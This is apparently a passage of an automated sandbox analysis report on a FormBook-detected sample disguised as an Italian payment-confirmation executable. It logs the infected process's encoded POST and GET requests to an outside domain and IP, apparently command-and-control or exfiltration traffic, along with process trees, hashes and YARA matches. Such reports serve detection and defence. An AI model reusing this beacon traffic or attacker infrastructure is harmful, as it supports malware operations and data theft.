                                                                            Data Ascii: Up5Dxd=h9DCpGygTpo0tMDIaI6Ud3lhFdRnZc4Mw613X3yprXBz8UjtJY6xOOPzdJfROdBO9M6/6FoIugTIJjwun68iH1rqoKTa0d0Lg76M/OoD1j/hOq0PYl6B736ao8UYbOyiKI+PhtbZY970NgI9ayahrJKuxUm7JIuV1Bj9nWxh1+OsOKViX/4NlGpvcnTWrLO3QrMBA9UgQvPG0BNBmU0vwiykFbR0OuJ5pqTQbUlF0l/2NCDL1yt7dcqQTdXTcCdYnBr9uo+RzYKAcpnmIVzBKhGvNhBbzp34owgaO1Dy0PcbBji9+05f4gxnwTuB2lKp7zmk6o89DQXSjFLHOhr6Dn9ak6mM9urqUwtkXwg5jdL3t84pQEO3IE51fzyZK4BxVToWECr1n8PpKMT6lQ2spYE066jvxdzYQQjSZYtFGU56ZrZJ3rTicOryg5tNqUXCYz215iCVfQ8YppcdCmhyh2pdt5vCPxqPGLrZ8I55VRDcfUXf+yB9ipWrJiUY8R+rIVcFE/ciXEg2F54whE6CP0+xN07hWmZqsyk0TqaGKUa7yI+eKsT7q9oUXWBBEDMEcfy1kxFstFnXw3JpYjT1ajKbaQDP5kJsJV9J8sw2tnieBBdZpEWAgAORp8Ap63IvE/9yVQif+bTPsJES1TW3Yag5HSe+ISt7IWIn0C3O78cZO5oePTRiFzhz8H4skzb5Pcf6zYhicw0ujRPgQyRY+92VAytnw4SemiGLoPg2JYF3wH35ygfyUuq6CeS2hf7TIZAN/GZHkJNVrFPKDat4L8HWt62oTT5SptaazPv/CgJ/RievHhhFPBaLJL4XqDLbCGuZeLZM5L1HPWSQ5CczEm8ZplgscFRUwoN+IafCv35bdtvpn4EeOFZculS9QbqQgHTetyOggOLtXFXUm/flHiECTZJ2B1ZRxecXhBm86prc3GJKV+nrdGD3VivQrJBlhK1B2guEHy7o11lyi+/jwetoDGVjh3EmCyjl7yIqaSPOW [TRUNCATED]
                                                                            Mar 28, 2025 14:35:47.669116020 CET721OUTData Raw: 6c 74 47 2b 43 75 47 72 51 61 45 4a 74 6f 39 58 4a 72 6f 6c 58 55 77 44 36 69 63 30 79 70 74 6c 45 49 6d 33 54 7a 65 61 31 4f 68 48 4a 79 61 4e 31 79 43 59 4d 71 2f 7a 61 36 78 32 74 59 62 37 6b 4a 56 41 2f 4b 45 52 78 50 43 6e 78 72 53 41 75 75
                                                                            Data Ascii: ltG+CuGrQaEJto9XJrolXUwD6ic0yptlEIm3Tzea1OhHJyaN1yCYMq/za6x2tYb7kJVA/KERxPCnxrSAuulBHnh+xEZwc42ZxkH4vD2ju4ZRexkCmuc7WA/jQNGII71lWHoLfzTLQPzVM+2EqyL9ZiCA7uwYGDANp2wR4wIFKCbTgR+kFQbLe2upKZImBNX08eUUMqOpeaWXLzJARE2tl1YZIqbWQ0Z7GjZc1XrhWli+SstQr8H
                                                                            Mar 28, 2025 14:35:47.851192951 CET533INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 28 Mar 2025 13:35:47 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            19192.168.2.2249180162.254.38.217801224C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Mar 28, 2025 14:35:50.306576967 CET822OUTPOST /qmo0/ HTTP/1.1
                                                                            Host: www.streartex.live
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Content-Length: 203
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Origin: http://www.streartex.live
                                                                            Referer: http://www.streartex.live/qmo0/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                                                                            Data Raw: 55 70 35 44 78 64 3d 68 39 44 43 70 47 79 67 54 70 6f 30 74 50 37 49 56 36 53 55 63 58 6c 68 43 64 52 6e 50 73 35 46 77 36 35 2f 58 32 47 48 72 6d 5a 7a 39 45 54 74 4a 4e 4f 78 50 4f 50 79 54 70 66 64 44 39 42 66 39 4d 36 64 36 48 4d 49 75 67 48 49 4b 41 59 75 68 35 6b 68 49 6c 72 6f 38 36 54 4f 30 64 77 34 67 37 2f 52 2f 50 41 44 31 68 72 68 4e 71 6b 50 54 58 69 42 74 33 36 59 67 63 56 51 62 4a 36 7a 4b 4c 57 39 68 73 6e 5a 59 4d 6e 30 4b 78 6f 39 4d 6c 32 68 67 70 4b 72 70 6b 6e 5a 45 6f 2b 51 37 54 58 33 6b 51 30 42 77 38 36 2b 47 36 78 37 61 4f 59 4d 6a 54 39 75 54 68 69 37 6c 2b 7a 39 48 67 3d 3d
                                                                            Data Ascii: Up5Dxd=h9DCpGygTpo0tP7IV6SUcXlhCdRnPs5Fw65/X2GHrmZz9ETtJNOxPOPyTpfdD9Bf9M6d6HMIugHIKAYuh5khIlro86TO0dw4g7/R/PAD1hrhNqkPTXiBt36YgcVQbJ6zKLW9hsnZYMn0Kxo9Ml2hgpKrpknZEo+Q7TX3kQ0Bw86+G6x7aOYMjT9uThi7l+z9Hg==
                                                                            Mar 28, 2025 14:35:50.483447075 CET533INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 28 Mar 2025 13:35:50 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            20192.168.2.2249181162.254.38.217801224C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            Mar 28, 2025 14:35:53.010860920 CET2062OUTPOST /qmo0/ HTTP/1.1
                                                                            Host: www.streartex.live
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Content-Length: 3627
                                                                            Cache-Control: max-age=0
                                                                            Connection: close
                                                                            Content-Type: application/x-www-form-urlencoded
                                                                            Origin: http://www.streartex.live
                                                                            Referer: http://www.streartex.live/qmo0/
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                                                                            Data Raw: 55 70 35 44 78 64 3d 68 39 44 43 70 47 79 67 54 70 6f 30 76 75 4c 49 58 62 53 55 65 33 6c 69 48 64 52 6e 5a 63 34 43 77 36 31 2f 58 33 79 70 72 54 70 7a 38 57 72 74 4a 6f 36 78 55 4f 50 79 43 35 66 52 4f 64 42 4a 39 49 54 69 36 46 56 71 75 6a 72 49 4a 68 49 75 6e 36 41 69 41 31 72 71 71 4b 54 50 30 64 78 69 67 2f 61 59 2f 50 46 6f 31 68 7a 68 4f 63 34 50 53 6e 69 41 78 6e 36 59 67 63 56 4d 62 4a 36 66 4b 49 6d 6c 68 74 2f 4a 59 2f 2f 30 4e 51 49 39 4c 79 61 69 30 5a 4b 76 67 45 6d 78 4a 49 6a 6e 31 42 6a 35 6e 57 4d 32 31 2b 43 73 42 35 4e 69 58 35 77 4f 67 57 70 73 59 6e 54 57 6d 72 4f 35 51 72 4d 64 41 39 55 67 51 76 62 47 37 78 4e 42 6d 52 41 75 6f 43 79 6b 47 62 52 70 41 4f 55 41 70 71 47 7a 62 51 59 2b 30 53 66 32 4d 41 62 4c 2f 69 74 37 4a 38 71 53 54 64 58 6b 57 69 63 78 6e 42 79 4f 75 72 58 4b 7a 59 4b 41 63 73 72 6d 43 6d 4c 42 44 52 47 76 43 42 42 59 35 4a 33 37 6f 77 73 6f 4f 32 66 79 30 4f 45 62 43 77 36 39 75 78 56 63 33 77 78 6d 30 54 75 44 79 6c 4b 47 37 7a 4b 4f 36 70 6f 58 44 54 50 [TRUNCATED]
                                                                            Data Ascii: Up5Dxd=h9DCpGygTpo0vuLIXbSUe3liHdRnZc4Cw61/X3yprTpz8WrtJo6xUOPyC5fROdBJ9ITi6FVqujrIJhIun6AiA1rqqKTP0dxig/aY/PFo1hzhOc4PSniAxn6YgcVMbJ6fKImlht/JY//0NQI9Lyai0ZKvgEmxJIjn1Bj5nWM21+CsB5NiX5wOgWpsYnTWmrO5QrMdA9UgQvbG7xNBmRAuoCykGbRpAOUApqGzbQY+0Sf2MAbL/it7J8qSTdXkWicxnByOurXKzYKAcsrmCmLBDRGvCBBY5J37owsoO2fy0OEbCw69uxVc3wxm0TuDylKG7zKO6poXDTPSjGzHNDD6CX9Z+KmA5un+Ux5GXwlMjbD3rpEpXGm4HU4+JjyTO4B9VS4oECL1kIbpYcz6z3Kr94F83ainrtzMQQHKZcgeHlJ6ZbZJwNHhW+rrtZthg0XQYz3T5jjicg0YptgdC1Zyh2pao5vAERn1GLnd8MZTVQzcfEnf+zB96ZWrACUh1x+bIU4zE+0UX002FbgwnHeCJU+kL07iZGZ3sy00TqOsKUi7zp+eIJ/7hdoQf2BoEDN9cce5k1YRtGPXw1hpIXn1XDKacQDLu0ISJVlZ8vlRtmqeBh9Zr1WA6gOTr8Apo3JsE/1iVS2P+evPs4USyzW4Q6g4Lye/fCtQIXkn0CrO790ZOJUeLg5iKjhxyn4qvTnVPa+JzZlyczwuiAPgYQJbyt2XVCsm04S2miGPoNQmJpl3+0z53DH1XOq9buSHv/6kIZwr/EFXke1VrF/KDI14LMHWt62rTT4VptmOzOfRCgJ/DDevHT5FHhaOBr5TuDKKCGiFePNq5KZHd2yQ5CcwZG8agFgrcFNNwoNcIaTCvF1bSfXpneoeD1ZcplS+a7r3gHSFtwr9gK/tX03Uh83iYCE5VZJgYldKxegPhE+86a/c1SVKVOnrD2DwNyvJ2Z9QhK4k2h/fADrozGtyg9ns2utTA2Vhh35YCy6o7yg6aR/OX [TRUNCATED]
                                                                            Mar 28, 2025 14:35:53.178570032 CET2062OUTData Raw: 33 34 57 79 53 75 47 48 39 61 48 4a 39 6f 4e 48 4a 70 39 52 58 64 67 44 36 6a 4d 30 79 70 74 6c 45 4d 6d 33 48 7a 65 62 79 4f 6b 53 4d 78 72 56 31 79 44 49 4d 70 75 7a 61 36 68 32 6b 56 37 37 2b 4a 55 38 50 4b 45 46 78 50 43 36 73 72 6e 51 75 76
                                                                            Data Ascii: 34WySuGH9aHJ9oNHJp9RXdgD6jM0yptlEMm3HzebyOkSMxrV1yDIMpuza6h2kV77+JU8PKEFxPC6srnQuvyVH3DWxO5wT+2Z/rnlID2Gf4aVexWGmvODWDYPQOGIF81lUHoPNzTLyPzVM+Coqz95ZjyA7gAZNdwM52wdhwIFsCYzgRuwFR6rewMBJUYmESH0gaUVPqOxeaUW+zJsRE1Fl1aBIqLWQxZ7F5pc9Xt9GlmqksdAr7D
                                                                            Mar 28, 2025 14:35:53.178570032 CET123OUTData Raw: 5a 45 2f 33 53 56 62 6b 66 72 70 37 7a 75 61 33 71 51 77 6b 64 46 6b 31 55 52 4e 4e 55 49 55 6a 57 70 43 63 46 35 4d 34 7a 72 2b 68 6b 44 59 69 76 35 71 58 39 61 63 52 65 71 4d 67 5a 6a 62 64 56 33 66 69 2b 64 68 76 4a 77 53 47 6d 6c 4b 4c 73 66
                                                                            Data Ascii: ZE/3SVbkfrp7zua3qQwkdFk1URNNUIUjWpCcF5M4zr+hkDYiv5qX9acReqMgZjbdV3fi+dhvJwSGmlKLsf9eKyaCkm9i1Hhv4328I9opPzFIB8utW/1xwx7Fg==
                                                                            Mar 28, 2025 14:35:53.364149094 CET533INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 28 Mar 2025 13:35:53 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            21192.168.2.2249182162.254.38.21780
                                                                            TimestampBytes transferredDirectionData
                                                                            Mar 28, 2025 14:35:55.715869904 CET557OUTGET /qmo0/?Up5Dxd=s/riq2Gjc84WkOXIPYK3MDRDBcdtSPFB6JhYX0OHrW5JrEb3J4m1Tdn1DtTVCNN6q5y0/nExmx/pVjwhpLktH0ipuaSv5IUB3fbV39kfxE7kNJsXW33X5BidtZsd&RtRt=H2TxDP-0yx HTTP/1.1
                                                                            Host: www.streartex.live
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Accept-Language: en-US,en;q=0.5
                                                                            Connection: close
                                                                            User-Agent: Mozilla/5.0 (Linux; Android 5.0; ALE-L21 Build/HuaweiALE-L21) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/37.0.0.0 Mobile Safari/537.36
                                                                            Mar 28, 2025 14:35:55.898338079 CET548INHTTP/1.1 404 Not Found
                                                                            Date: Fri, 28 Mar 2025 13:35:55 GMT
                                                                            Server: Apache
                                                                            Content-Length: 389
                                                                            Connection: close
                                                                            Content-Type: text/html; charset=utf-8
                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                            Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                            Statistics

                                                                            CPU Usage

                                                                            Click to jump to process

                                                                            Memory Usage

                                                                            Click to jump to process

                                                                            High Level Behavior Distribution

                                                                            • File
                                                                            • Registry
                                                                            • Network

                                                                            Click to dive into process behavior distribution

                                                                            Behavior

                                                                            Click to jump to process

                                                                            System Behavior

                                                                            General

                                                                            Target ID:0
                                                                            Start time:09:33:44
                                                                            Start date:28/03/2025
                                                                            Path:C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exe"
                                                                            Imagebase:0x1260000
                                                                            File size:1'170'944 bytes
                                                                            MD5 hash:A5550246C73F30ED5FD68BB236675D46
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Reputation:low
                                                                            Has exited:true
                                                                            Show Windows behavior

                                                                            File Activities

                                                                            Show Windows behavior

                                                                            Section Activities

                                                                            Show Windows behavior

                                                                            Registry Activities

                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            Show Windows behavior

                                                                            Process Activities

                                                                            Show Windows behavior

                                                                            Thread Activities

                                                                            Show Windows behavior

                                                                            Memory Activities

                                                                            Show Windows behavior

                                                                            System Activities

                                                                            Timing Activities

                                                                            Show Windows behavior

                                                                            Windows UI Activities

                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                            General

                                                                            Target ID:2
                                                                            Start time:09:33:45
                                                                            Start date:28/03/2025
                                                                            Path:C:\Windows\SysWOW64\svchost.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\Desktop\LETTERA DI CONFERMA DEL PAGAMENTO.exe"
                                                                            Imagebase:0xba0000
                                                                            File size:20'992 bytes
                                                                            MD5 hash:54A47F6B5E09A77E61649109C6A08866
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.419495871.0000000000290000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.419524838.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000002.00000002.419614314.0000000001FB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:moderate
                                                                            Has exited:true
                                                                            Show Windows behavior

                                                                            File Activities

                                                                            Show Windows behavior

                                                                            Section Activities

                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            Show Windows behavior

                                                                            Process Activities

                                                                            Show Windows behavior

                                                                            Thread Activities

                                                                            Show Windows behavior

                                                                            Memory Activities

                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                            Windows UI Activities

                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                            General

                                                                            Target ID:3
                                                                            Start time:09:34:08
                                                                            Start date:28/03/2025
                                                                            Path:C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\rGdWid9z.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\rGdWid9z.exe"
                                                                            Imagebase:0x200000
                                                                            File size:143'872 bytes
                                                                            MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.627085177.0000000003E60000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:false
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            Show Windows behavior

                                                                            Section Activities

                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            Show Windows behavior

                                                                            Memory Activities

                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                            General

                                                                            Target ID:4
                                                                            Start time:09:34:09
                                                                            Start date:28/03/2025
                                                                            Path:C:\Windows\SysWOW64\net1.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\net1.exe"
                                                                            Imagebase:0x370000
                                                                            File size:142'336 bytes
                                                                            MD5 hash:2041012726EF7C95ED51C15C56545A7F
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.626895631.00000000001E0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.626885310.0000000000190000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.626861797.0000000000080000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:moderate
                                                                            Has exited:false
                                                                            Show Windows behavior

                                                                            File Activities

                                                                            Show Windows behavior

                                                                            Section Activities

                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            Show Windows behavior

                                                                            Process Activities

                                                                            Show Windows behavior

                                                                            Thread Activities

                                                                            Show Windows behavior

                                                                            Memory Activities

                                                                            Show Windows behavior

                                                                            System Activities

                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            Show Windows behavior

                                                                            Windows UI Activities

                                                                            Network Activities

                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                            General

                                                                            Target ID:5
                                                                            Start time:09:34:22
                                                                            Start date:28/03/2025
                                                                            Path:C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\EMNJeTTlkQkIIjjKIvaMmQrOemPJNTPsEGuuejKdptDmhgjWVyz\BupJjuMCJB.exe"
                                                                            Imagebase:0x1040000
                                                                            File size:143'872 bytes
                                                                            MD5 hash:9C98D1A23EFAF1B156A130CEA7D2EE3A
                                                                            Has elevated privileges:true
                                                                            Has administrator privileges:true
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.626989631.0000000000560000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            Reputation:high
                                                                            Has exited:false
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            Show Windows behavior

                                                                            Section Activities

                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            Show Windows behavior

                                                                            Thread Activities

                                                                            Show Windows behavior

                                                                            Memory Activities

                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.
                                                                            There is hidden Windows Behavior. Click on Show Windows Behavior to show it.

                                                                            General

                                                                            Target ID:8
                                                                            Start time:09:34:38
                                                                            Start date:28/03/2025
                                                                            Path:C:\Program Files (x86)\Mozilla Firefox\firefox.exe
                                                                            Wow64 process (32bit):true
